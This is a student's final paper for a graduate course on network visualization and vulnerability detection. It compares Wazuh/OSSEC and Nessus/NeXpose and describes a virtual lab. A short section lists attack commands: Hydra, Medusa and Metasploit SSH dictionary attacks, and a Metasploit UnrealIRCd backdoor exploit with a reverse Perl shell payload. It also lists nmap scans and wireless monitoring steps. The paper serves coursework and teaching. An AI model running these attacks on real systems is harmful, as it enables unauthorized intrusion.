1

Module 7: Network Visualization & Vulnerability Final Paper

Russell A. Findley

Masters of Science in Cyber Security Operations and Leadership, University of San Diego

CSOL-570-02-SU21 – Network Visualization and Vulnerability Detection

Author: Russell Findley

Professor Nikolas Behar

August 16, 2021

 2

Contents

Trade Studies.............................................................................................................................................3

Network Security Visualization...............................................................................................................3

Vulnerability Scanning............................................................................................................................5

Nessus.................................................................................................................................................5

NeXpose..............................................................................................................................................5

Virtualized test lab architecture...............................................................................................................6

Security Toolkit.........................................................................................................................................7

Surveillance and reconnaissance processes.............................................................................................8

Scan a network to determine the operating systems installed on hosts....................................................8

Perform a dictionary attack against a host's SSH service.........................................................................8

Launch an exploit payload against a vulnerable web service...................................................................8

Identify the ports listening on a host........................................................................................................8

Eavesdrop on communications between two hosts..................................................................................8

Identify the SSID of an active wireless network....................................................................................10

Lessons Learned and Final Thoughts....................................................................................................10

References................................................................................................................................................12
 3

Trade Studies

Network Security Visualization

A trade study was completed to evaluate two different types of network security visualization

tools. Network security visualization tools are often software packages that monitor and ingest

information from the network and endpoints to view an organization's security posture. The two

products reviewed; Wazuh and OSSEC. To perform a comprehensive review of both products, it

was necessary to check the manual, identify online reviews, and perform a software installation.

The following criteria were also compared:

Scalability and reliability

 Support for managers to scale  Support for AIX, Solaris, Mac OS X

horizontally.
 TCP support for agent-manager
communications.
 Anti-flooding features
 AES encryption is used for agent-
manager communications
 Multi-threading to support faster
processing.
and HP-UX.
 RESTful API for status monitoring,
 Ability to upgrade agents from the
managers.
 Improved centralized configuration
management using agent groups
Intrusion detection

 Log analysis engine.

Installation and configuration management
 MSI signed package for Windows
systems, with auto registration and
configuration support.
 Unified RPM and Deb Linux
packages.
 Ability to monitor larger sized
messages.
 Support for native rules for Suricata.
 NIDS management.
 Support for IP reputation databases.
 Integration with Linux and
Windows.
 4

Integration with cloud providers Incident response

 Integration with major cloud  Software and hardware inventory

providers (AWS, Azure, GCP)
 Module for native integration with
Microsoft Azure.
Regulatory compliance
 Compliance mapping with standards
like PCI or CIS
 SHA256 hashes used for file
integrity monitoring
Elastic Stack integration
 Provides the ability to index and
query data.
 Kibana plugin used to visualize data
 Web user interface pre-configured
extensions, adapting them to your
use cases.
system
 Module for integration with open
source endpoint tools
 Log collection output options
 Integration with Virus Total
Vulnerability detection and configuration
assessment
 Dynamic creation of CVE
vulnerability databases, gathering
data from OVAL repositories.
 Cross-correlation with applications
to detect vulnerable software.
 Integrates with external vulnerability
sources

The sources for the criteria were taken from (Wazuh, 2021) (OSSEC, 2020)

OSSEC – Is a Host-based Intrusion Detection System. OSSEC is an open-source host-based

intrusion detection system "powerful correlation and analysis engine that integrates log analysis,

file integrity monitoring, centralized policy enforcement, rootkit detection, real-time alerting, and

active response" (Cid, 2020). OSSEC has been around since 2008 and has an active community

of users. The features evaluated were only in the community version of the product.
 5

Wazuh - Open Source Host and Endpoint Security. It provides new detection and compliance

capabilities by creating a fork of the OSSEC software. Wazuh appears to be 100% due to the

underlying software also being Open Source (ELK).

Vulnerability Scanning

Vulnerability scanning is the process of looking for misconfigurations or software exploits in an

operating system or application. There are commercial vendors and open-source technologies

that scan for these vulnerabilities and provide recommendations for remediation. For the trade

study, the following open source solutions were evaluated.

Nessus

Nessus is a popular product which competes with other vulnerability management products from

companies such as Rapid7, Qualys, and other open-source tools like OpenVAS. The tool

features include "high-speed discovery, configuration auditing, asset profiling, sensitive data

discovery, patch management integration, and vulnerability analyses' of a security posture"

(Professors, 2017). Nessus is considered to be the most straightforward vulnerability scanner on

the market to install and operate. For years, Nessus was used by smaller organizations and also

offered an open-source tool. They have since changed their licensing model and available

features to compete with the more significant players in the space. Nessus provides a limited

version of their product for smaller environments and students free by restricting the IP addresses

available to scan to 16.

 6

NeXpose

NeXpose is a vulnerability scanner created and supported by Rapid7. They have two types of

vulnerability management products, NeXpose and InsightVM. NeXpose is the on-premise

scanner that has slightly fewer features than other competitive products. Rapid7 has other

products like Metasploit, which takes vulnerabilities from tools such as NeXpose and attempts to

exploit them. NeXpose can quickly scan a network for exposures and provide real-time risk and

options for remediation with a comprehensive set of risk analysis tools and reporting capabilities.

NeXpose has a community edition, which is free to users but limited to scan 16 IP addresses.

Virtualized test lab architecture

Virtual Server IP Address Description (Role)

Metasploitable 192.168.76.31/24 Metasploitable is a virtual Linux server created by Rapid7, which

contains known vulnerabilities. The virtual machine is used to test

exploits from penetration testing servers and software.

Kali Linux 192.168.76.35/24 Kali Linux servers is an open-source penetration testing platform.

2021.2 Kali is used to exploiting other servers and services within the

network.

Ubuntu 192.168.76.36/24 The Ubuntu Linux server is used as a host on the network for

running the Wazuh agent for network visualization monitoring.

Windows Server 192.168.76.38/24 The Windows server is used as a host on the network for running

Developer the Wazuh agent for network visualization monitoring.

Edition

Wazuh 192.168.76.42/24 The Wazuh is a virtual appliance that contains a network

 7

visualization monitoring platform.

Security Toolkit

Tool Role

Wireshark Tool designed to capture network traffic for analysis. Wireshark is

used to analyze traffic patterns traversing the network.

Metasploit Software is used to exploit a computer and gain remote control.

Kismet Software used to monitor wireless network traffic.

Wazuh Network security visualization tool that baselines and monitors events
 8

in an environment.

Oracle Virtual Box The hypervisor used to create virtual machines

Surveillance and reconnaissance processes

Scan a network to determine the operating systems installed on hosts
o Nmap -O 192.168.5.102
o (University, 2021)
Perform a dictionary attack against a host's SSH service

o Hydra
 hydra -L user.txt -P password.txt 192.168.0.8 ssh
o Medusa
 medusa -h 192.168.0.8 -U user.txt -P password.txt -M ssh
o Metasploit
 use auxiliary/scanner/ssh/ssh_login
 set RHOST 192.168.0.8
 set user_file user.txt
 set pass_file password.txt
 run
 (Chandel, 2020)
Launch an exploit payload against a vulnerable web service

o Metasploit
 Use exploit/unix/unreal_ircd_3281_backdoor
 Set RHOST 10.1.2.5
 Show options
 Show payloads
 Set payload payload/cmd/unix/reverse_perl
 Set LHOST 10.1.2.4
 exploit

Identify the ports listening on a host

o To scan all ports (1 – 65535) (Jevtic, 2021):
 Nmap –p– 192.168.0.1
Eavesdrop on communications between two hosts
 The select interface screen will appear or go to the menu bar and choose Capture 

Options  select interface

o In my case, the interface is eth0

 9

 Go to the menu bar and select Capture  Start

 Launch a web browser  Open orvis.com click product pages

 Lanch another web browser  Open Sephora.com  Click product pages

 When completed, choose Capture  Stop

Wireshark is a free tool, which allows computer and network operators to inspect network traffic.

The tool is most often used to troubleshoot network issues because you can view the traffic in

real-time. Wireshark is helpful to diagnose the following (Porup, 2018):

 Diagnose dropped packets

 Identify network latency

 Identify malicious traffic

 Individuals with a background in networking

best use Wireshark. Understanding the

TCP/IP stack and associated protocols is

 10

essential due to the output of information provided by the tool. Wireshark can identify

both TCP and UDP traffic. In addition to other traffic such as broadcast, encrypted,

VOIP, ICMP, etc.

Identify the SSID of an active wireless network Figure 1 (Blogspot, 2020)

 Kismet
o sudo airmon-ng start wlan0
o sudo airmon-ng check kill
o Open browser and open http://localhost:2501
o Enable Data Sources
o Available SSID's will show on screen

Lessons Learned and Final Thoughts

I have been waiting for this class for quite some time to learn more about penetration testing and

whitehat hacking. I have previous experience with Windows, Linux, and Solaris operating

systems, so I figured I would have an advantage in installing software and configuring the tools

in Kali. I learned that I was partially correct. When configuring the operating system, I was at

ease with the command line, but installing the tools and configuration was much more difficult

than I initially expected. Each of the tools I installed required more libraries and .conf file

configurations to make them work. I was pleased that I could make everything work in the end,

but I took a significant amount of time trying to make everything function. Reading the manuals,

researching forums, and learning through trial and error is never an easy process, but in the end, I

feel that I learned a lot.

We could have gone a little deeper into a few topics, such as Wireshark. I know Wireshark is the

defacto tool used by most organizations, and learning how to interpret traffic captures will be

something I delve into more at a later date. Some of the software like Kismet had been

revamped from the documentation provided in the lesson. I would have preferred to have spent
 11

more time learning about the product, but instead, a significant amount of time was spent

installing a USB adapter. My recommendation for future classes is to provide a list of USB

adapters that are shown to work.

This class fills me with the hope of learning more about security operations tools and becoming a

more decisive leader. The more I understand how a hacker will execute attacks, the better I can

build a cybersecurity operation department. I look forward to digging a little deeper into more of

the Kali tools and integrating these into my work.

 12

References

Blogspot. (2020). OSI Model Explained Summary:Definitions and Functions | CCNA

QUESTIONS AND ANSWERS.

https://ciscoquestionsandanswers.blogspot.com/2014/12/osi-model-explained-

summarydefinitions.html.

Chandel, R. (2020, July 30). Password cracking:ssh. Hacking Articles.

https://www.hackingarticles.in/password-crackingssh/.

Jevtic, G. (2021, May 14). How to use nmap to scan for open Ports {updated 2021}. Knowledge

Base by phoenixNAP. https://phoenixnap.com/kb/nmap-scan-open-ports.

OSSEC. (2020). OSSEC Documentation¶. OSSEC. https://www.ossec.net/docs/.

Professors, E. (2017). Comparison Essay Sample: Nessus vs NeXpose. essaysprofessors.com.

https://essaysprofessors.com/samples/comparison/nessus-vs-nexpose.html.

University, G. (2021). Determine operating system: Nmap. Geek University. https://geek-

university.com/nmap/determine-operating-system/.

Wazuh. (2021). User manual · Wazuh 4.1 documentation.

https://documentation.wazuh.com/current/user-manual/index.html.